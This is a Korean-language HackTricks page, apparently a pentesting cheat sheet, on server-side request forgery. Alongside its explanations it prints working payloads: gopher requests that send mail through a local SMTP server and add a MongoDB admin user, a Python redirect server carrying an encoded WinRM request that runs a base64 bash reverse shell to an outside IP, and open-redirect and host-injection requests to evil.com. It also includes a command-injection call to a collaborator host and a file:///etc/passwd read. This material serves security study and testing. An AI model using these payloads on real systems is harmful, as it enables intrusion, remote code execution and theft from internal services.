SSRF (서버 측 요청 위조)

Reading time: 22 minutes

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks 지원하기

기본 정보

서버 측 요청 위조(SSRF) 취약점은 공격자가 서버 측 애플리케이션을 조작하여 자신이 선택한 도메인에 HTTP 요청을 하도록 할 때 발생합니다. 이 취약점은 서버를 공격자가 지시하는 임의의 외부 요청에 노출시킵니다.

SSRF 캡처

가장 먼저 해야 할 일은 당신이 생성한 SSRF 상호작용을 캡처하는 것입니다. HTTP 또는 DNS 상호작용을 캡처하기 위해 다음과 같은 도구를 사용할 수 있습니다:

화이트리스트 도메인 우회

보통 SSRF는 특정 화이트리스트 도메인이나 URL에서만 작동합니다. 다음 페이지에는 그 화이트리스트를 우회하기 위한 기술 모음이 있습니다:

URL Format Bypass

오픈 리다이렉트를 통한 우회

서버가 제대로 보호되고 있다면 웹 페이지 내의 오픈 리다이렉트를 이용하여 모든 제한을 우회할 수 있습니다. 웹 페이지는 **같은 도메인에 대한 SSRF를 허용하고 아마도 리다이렉트를 따를 것입니다, 이를 통해 오픈 리다이렉트를 이용해 서버가 내부의 어떤 리소스에도 접근하도록 할 수 있습니다.
자세한 내용은 여기에서 읽어보세요: https://portswigger.net/web-security/ssrf

프로토콜

  • file://
  • URL 스킴 file://이 참조되며, /etc/passwd를 직접 가리킵니다: file:///etc/passwd
  • dict://
  • DICT URL 스킴은 DICT 프로토콜을 통해 정의나 단어 목록에 접근하는 데 사용됩니다. 특정 단어, 데이터베이스 및 항목 번호를 목표로 하는 URL을 구성한 예가 제공되며, 공격자가 제공한 자격 증명을 사용하여 DICT 서버에 연결하기 위해 PHP 스크립트가 잘못 사용될 수 있는 사례도 포함됩니다: dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>
  • SFTP://
  • 보안 셸을 통한 안전한 파일 전송 프로토콜로 확인되며, 악성 SFTP 서버에 연결하기 위해 PHP 스크립트를 악용하는 방법을 보여주는 예가 제공됩니다: url=sftp://generic.com:11111/
  • TFTP://
  • UDP를 통해 작동하는 트리비얼 파일 전송 프로토콜이 언급되며, TFTP 서버에 요청을 보내기 위해 설계된 PHP 스크립트의 예가 포함됩니다. 'generic.com'의 포트 '12346'에 'TESTUDPPACKET' 파일에 대한 TFTP 요청이 이루어집니다: ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET
  • LDAP://
  • 이 섹션은 경량 디렉터리 접근 프로토콜을 다루며, IP 네트워크를 통해 분산 디렉터리 정보 서비스 관리 및 접근에 사용됩니다. 로컬호스트에서 LDAP 서버와 상호작용: '%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.
  • SMTP
  • SSRF 취약점을 악용하여 로컬호스트의 SMTP 서비스와 상호작용하는 방법이 설명되며, 내부 도메인 이름을 드러내고 그 정보를 기반으로 추가 조사 작업을 수행하는 단계가 포함됩니다.
From https://twitter.com/har1sec/status/1182255952055164929
1. connect with SSRF on smtp localhost:25
2. from the first line get the internal domain name 220[ http://blabla.internaldomain.com ](https://t.co/Ad49NBb7xy)ESMTP Sendmail
3. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH)on github, find subdomains
4. connect
  • Curl URL globbing - WAF 우회
  • SSRF가 curl에 의해 실행되는 경우, curl에는 WAF를 우회하는 데 유용할 수 있는 URL globbing이라는 기능이 있습니다. 예를 들어 이 writeup에서 file 프로토콜을 통한 경로 탐색의 예를 찾을 수 있습니다:
file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
  • Gopher://
  • Gopher 프로토콜의 서버 통신을 위한 IP, 포트 및 바이트 지정 기능과 페이로드 생성을 위한 Gopherus 및 remote-method-guesser와 같은 도구에 대해 논의합니다. 두 가지 뚜렷한 사용 사례가 설명됩니다:

Gopher://

이 프로토콜을 사용하면 서버에 전송IP, 포트 및 바이트를 지정할 수 있습니다. 그런 다음, 기본적으로 SSRF를 이용하여 모든 TCP 서버와 통신할 수 있습니다(하지만 먼저 서비스와 대화하는 방법을 알아야 합니다).
다행히도, 여러 서비스에 대한 페이로드를 생성하기 위해 Gopherus를 사용할 수 있습니다. 또한, remote-method-guesser를 사용하여 Java RMI 서비스에 대한 gopher 페이로드를 생성할 수 있습니다.

Gopher smtp

ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT

고퍼 HTTP

bash
#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body

Gopher SMTP — 1337에 백커넥트

redirect.php
<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>Now query it.
https://example.com/?q=http://evil.com/redirect.php.

Gopher MongoDB -- 사용자 이름=admin, 비밀번호=admin123, 권한=administrator로 사용자 생성

bash
# Check: https://brycec.me/posts/dicectf_2023_challenges#unfinished
curl 'gopher://0.0.0.0:27017/_%a0%00%00%00%00%00%00%00%00%00%00%00%dd%0
7%00%00%00%00%00%00%00%8b%00%00%00%02insert%00%06%00%00%00users%00%02$db%00%0a
%00%00%00percetron%00%04documents%00V%00%00%00%030%00N%00%00%00%02username%00%
06%00%00%00admin%00%02password%00%09%00%00%00admin123%00%02permission%00%0e%00
%00%00administrator%00%00%00%00'

SSRF via Referrer header & Others

서버의 분석 소프트웨어는 종종 Referrer 헤더를 기록하여 들어오는 링크를 추적하는데, 이로 인해 애플리케이션이 Server-Side Request Forgery (SSRF) 취약점에 노출될 수 있습니다. 이는 이러한 소프트웨어가 Referrer 헤더에 언급된 외부 URL을 방문하여 추천 사이트 콘텐츠를 분석할 수 있기 때문입니다. 이러한 취약점을 발견하기 위해 Burp Suite 플러그인 "Collaborator Everywhere"를 사용하는 것이 권장되며, 이는 분석 도구가 Referer 헤더를 처리하는 방식을 활용하여 잠재적인 SSRF 공격 표면을 식별합니다.

SSRF via SNI data from certificate

간단한 설정을 통해 백엔드에 연결할 수 있게 하는 잘못된 구성은 예시 Nginx 구성으로 설명됩니다:

stream {
server {
listen 443;
resolver 127.0.0.11;
proxy_pass $ssl_preread_server_name:443;
ssl_preread on;
}
}

이 구성에서 Server Name Indication (SNI) 필드의 값이 백엔드 주소로 직접 사용됩니다. 이 설정은 Server-Side Request Forgery (SSRF)에 대한 취약점을 노출시키며, SNI 필드에 원하는 IP 주소나 도메인 이름을 지정하는 것만으로도 악용될 수 있습니다. 임의의 백엔드, 예를 들어 internal.host.com에 연결을 강제하기 위한 악용 예시는 아래와 같습니다:

bash
openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf

Wget 파일 업로드

명령 주입을 통한 SSRF

다음과 같은 페이로드를 시도해 볼 가치가 있을 수 있습니다: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`

PDF 렌더링

웹 페이지가 제공한 정보를 바탕으로 자동으로 PDF를 생성하는 경우, PDF 생성기(서버)에 의해 실행될 JS를 삽입할 수 있으며, 이를 통해 SSRF를 악용할 수 있습니다. 자세한 정보는 여기에서 확인하세요.

SSRF에서 DoS로

여러 세션을 생성하고 세션에서 SSRF를 악용하여 대용량 파일을 다운로드해 보세요.

SSRF PHP 함수

취약한 PHP 및 Wordpress 함수를 확인하려면 다음 페이지를 참조하세요:

PHP SSRF

Gopher로의 SSRF 리디렉션

일부 익스플로잇을 위해 리디렉션 응답을 전송해야 할 수 있습니다(gopher와 같은 다른 프로토콜을 사용하기 위해). 여기 리디렉션으로 응답하기 위한 다양한 파이썬 코드가 있습니다:

python
# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

class MainHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("GET")
self.send_response(301)
self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()
python
from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)

@app.route('/')
def root():
return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)

if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)

잘못 구성된 프록시를 통한 SSRF

Tricks from this post.

Flask

Flask 프록시 취약한 코드
python
from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com'

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')

def proxy(path):
return get(f'{SITE_NAME}{path}').content

if __name__ == "__main__":
app.run(threaded=False)

Flask는 **@**를 초기 문자로 사용할 수 있게 하여 초기 호스트 이름을 사용자 이름으로 만들고 새로운 호스트 이름을 주입할 수 있습니다. 공격 요청:

http
GET @evildomain.com/ HTTP/1.1
Host: target.com
Connection: close

Spring Boot

취약한 코드:

요청의 경로를 문자 **;**로 시작할 수 있다는 것이 발견되었으며, 이를 통해 **@**를 사용하고 새로운 호스트를 주입하여 접근할 수 있습니다. 공격 요청:

http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

PHP 내장 웹 서버

취약한 PHP 코드
php
<?php
$site = "http://ifconfig.me";
$current_uri = $_SERVER['REQUEST_URI'];

$proxy_site = $site.$current_uri;
var_dump($proxy_site);

echo "\n\n";

$response = file_get_contents($proxy_site);
var_dump($response);
?>

PHP는 URL 경로의 슬래시 앞에 **문자 ***를 사용할 수 있지만, 루트 경로 /에만 사용할 수 있고 첫 번째 슬래시 앞에 점 .이 허용되지 않는 등의 다른 제한이 있습니다. 따라서 예를 들어 점 없는 헥스 인코딩된 IP 주소를 사용해야 합니다:

http
GET *@0xa9fea9fe/ HTTP/1.1
Host: target.com
Connection: close

DNS Rebidding CORS/SOP 우회

로컬 IP에서 콘텐츠를 추출하는 데 문제가 발생하는 경우 CORS/SOP 때문에 DNS Rebidding을 사용하여 해당 제한을 우회할 수 있습니다:

CORS - Misconfigurations & Bypass

자동화된 DNS Rebidding

Singularity of OriginDNS rebinding 공격을 수행하는 도구입니다. 공격 서버의 DNS 이름의 IP 주소를 대상 머신의 IP 주소로 다시 바인딩하고, 대상 머신의 취약한 소프트웨어를 악용하기 위한 공격 페이로드를 제공하는 데 필요한 구성 요소를 포함합니다.

또한 공식적으로 운영되는 서버를 확인하세요 http://rebind.it/singularity.html

DNS Rebidding + TLS 세션 ID/세션 티켓

요구 사항:

  • SSRF
  • 아웃바운드 TLS 세션
  • 로컬 포트의 항목

공격:

  1. 사용자/봇에게 공격자가 제어하는 도메인접근하도록 요청합니다.
  2. DNSTTL0초입니다 (따라서 피해자는 곧 도메인의 IP를 다시 확인할 것입니다).
  3. 피해자와 공격자의 도메인 간에 TLS 연결이 생성됩니다. 공격자는 세션 ID 또는 세션 티켓 내에 페이로드를 삽입합니다.
  4. 도메인자신에 대한 무한 루프의 리디렉션을 시작합니다. 이 목표는 사용자/봇이 도메인에 접근하여 다시 도메인의 DNS 요청을 수행하도록 만드는 것입니다.
  5. DNS 요청에서 이제 사설 IP 주소가 제공됩니다 (예: 127.0.0.1).
  6. 사용자/봇은 TLS 연결을 재설정하려고 시도하며, 이를 위해 세션 ID/티켓 ID를 전송합니다 (여기에는 공격자의 페이로드가 포함되어 있습니다). 축하합니다, 당신은 사용자/봇이 스스로 공격하도록 요청하는 데 성공했습니다.

이 공격 중에 localhost:11211 (memcache)를 공격하려면 피해자가 www.attacker.com:11211과 초기 연결을 설정해야 합니다 ( 포트는 항상 동일해야 합니다).
이 공격을 수행하려면 다음 도구를 사용할 수 있습니다: https://github.com/jmdx/TLS-poison/
자세한 정보는 이 공격이 설명된 강의를 확인하세요: https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference

블라인드 SSRF

블라인드 SSRF와 비블라인드 SSRF의 차이점은 블라인드에서는 SSRF 요청의 응답을 볼 수 없다는 것입니다. 따라서 잘 알려진 취약점만을 악용할 수 있기 때문에 악용하기가 더 어렵습니다.

시간 기반 SSRF

서버의 응답 시간을 확인함으로써 자원이 존재하는지 여부를 알 수 있을 수 있습니다 (존재하는 자원에 접근하는 데 더 오랜 시간이 걸릴 수 있습니다).

클라우드 SSRF 악용

클라우드 환경에서 실행 중인 머신에서 SSRF 취약점을 발견하면 클라우드 환경에 대한 흥미로운 정보와 심지어 자격 증명을 얻을 수 있습니다:

Cloud SSRF

SSRF 취약한 플랫폼

여러 알려진 플랫폼에는 SSRF 취약점이 포함되어 있거나 포함된 적이 있습니다. 확인하세요:

SSRF Vulnerable Platforms

도구

SSRFMap

SSRF 취약점을 탐지하고 악용하는 도구입니다.

Gopherus

이 도구는 다음을 위한 Gopher 페이로드를 생성합니다:

  • MySQL
  • PostgreSQL
  • FastCGI
  • Redis
  • Zabbix
  • Memcache

remote-method-guesser

_remote-method-guesser_는 대부분의 일반적인 Java RMI 취약점에 대한 공격 작업을 지원하는 Java RMI 취약점 스캐너입니다. 사용 가능한 대부분의 작업은 요청된 작업에 대한 SSRF 페이로드를 생성하기 위해 --ssrf 옵션을 지원합니다. --gopher 옵션과 함께 사용하면 즉시 사용할 수 있는 gopher 페이로드를 직접 생성할 수 있습니다.

SSRF Proxy

SSRF Proxy는 서버 측 요청 위조(SSRF)에 취약한 HTTP 서버를 통해 클라이언트 HTTP 트래픽을 터널링하도록 설계된 다중 스레드 HTTP 프록시 서버입니다.

연습하기

GitHub - incredibleindishell/SSRF_Vulnerable_Lab: This Lab contain the sample codes which are vulnerable to Server-Side Request Forgery attack

참고 문헌

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks 지원하기